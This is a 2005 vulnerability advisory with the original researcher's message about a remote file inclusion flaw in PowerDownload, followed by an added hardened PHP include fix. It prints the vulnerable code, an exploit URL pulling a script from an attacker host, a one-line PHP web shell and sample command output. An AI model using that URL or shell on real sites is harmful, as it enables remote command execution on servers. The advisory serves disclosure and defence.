PowerDownload Include File Bug Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID: 1014078
SecurityTracker URL: http://securitytracker.com/id?1014078
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 31 2005
Impact: Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 3.0.2, 3.0.3
Description: SoulBlack Security Research reported a vulnerability in PowerDownload. A remote user can execute arbitrary commands on the target system.
The 'pdl-inc/pdl_header.inc.php' script does not properly validate the 'incdir' variable. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.
A demonstration exploit URL is provided:
http://[target]/download/downloads.php?release_id=650&incdir=http://[attacker]/cmd.gif?&cmd=uname%20-a
The original advisory is available at:
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution: No solution was available at the time of this entry.
Vendor URL: www.powerscripts.org/?page=projects&projectid=6
Cause: Input validation error, State error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: SoulBlack Group <soulblacktm@gmail.com>
Message History: None.

Source Message Contents
Date: Tue, 31 May 2005 00:05:34 -0300
From: SoulBlack Group <soulblacktm@gmail.com>
Subject: PowerDownload Remote File Inclusion
===========================================================
============================================================
Title: PowerDownload Remote File Inclusion.
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 31/05/2005
Severity: High. Remote Users Can Execute Arbitrary Code.
Affected version: v3.0.2 & v3.0.3
vendor: http://www.powerscripts.org/
============================================================
============================================================
* Summary *
PowerDownload is a PHP and mySQL based Download Script.
-------------------------------------------------------------
* Problem Description *
The bug resides in the $incdir var in pdl-inc/pdl_header.inc.php
Vulnerable Code
// Include required Files
if(!isset($incdir)) $incdir = "";
require($incdir."pdl-inc/pdl_config.inc.php");
require($incdir."pdl-inc/pdl_db_class_".strtolower($config_sql_type).".inc.php");
require($incdir."pdl-inc/pdl_functions.inc.php");
/*
http://server/download/downloads.php?release_id=650&incdir=http://evil/cmd.gif?&cmd=uname%20-a
Linux webserver101 2.4.21-243-athlon #1 Thu Aug 12 15:24:15 UTC 2004 i686 athlon
*/
/*
-------
cmd.gif
-------
<?
system($cmd);
?>
*/
-------------------------------------------------------------
-------------------------------------------------------------
* Fix *
Contact the Vendor.
-------------------------------------------------------------
* References *
http://www.soulblack.com.ar/repo/papers/advisory/powerdownload_advisory.txt
-------------------------------------------------------------
* Credits *
Vulnerability reported by SoulBlack Security Research
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
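
The entry lists no solution, so the following is an added example of a hardened include preamble for pdl-inc/pdl_header.inc.php; it is not code from SoulBlack, SecurityTracker or the vendor. It assumes the file sits in <application root>/pdl-inc/, that $incdir is used only to build filesystem include paths, and the driver name in the allow-list is illustrative.

```php
<?php
// Added example, not vendor code: hardened preamble for
// pdl-inc/pdl_header.inc.php.
// Assumption: this file lives in <application root>/pdl-inc/.

// Derive the include base from this file's own location. The original
// `if(!isset($incdir)) $incdir = "";` trusted a variable that a request
// parameter can pre-populate when register_globals is enabled, which is
// how ?incdir=http://... reached require().
$incdir = dirname(dirname(__FILE__)) . DIRECTORY_SEPARATOR;

require($incdir . "pdl-inc/pdl_config.inc.php");

// $config_sql_type is also concatenated into an include path, so limit
// it to known drivers. The list below is an assumption for illustration;
// use the driver files actually shipped in pdl-inc/.
$allowed_sql_types = array("mysql");
$sql_type = strtolower($config_sql_type);
if (!in_array($sql_type, $allowed_sql_types, true)) {
    header("HTTP/1.1 500 Internal Server Error");
    exit("Unsupported database type in configuration.");
}

require($incdir . "pdl-inc/pdl_db_class_" . $sql_type . ".inc.php");
require($incdir . "pdl-inc/pdl_functions.inc.php");
```

As defence in depth, setting `register_globals = Off` and `allow_url_fopen = Off` (or `allow_url_include = Off` on PHP 5.2 and later) in php.ini keeps request parameters out of script variables and stops `require` from fetching a URL.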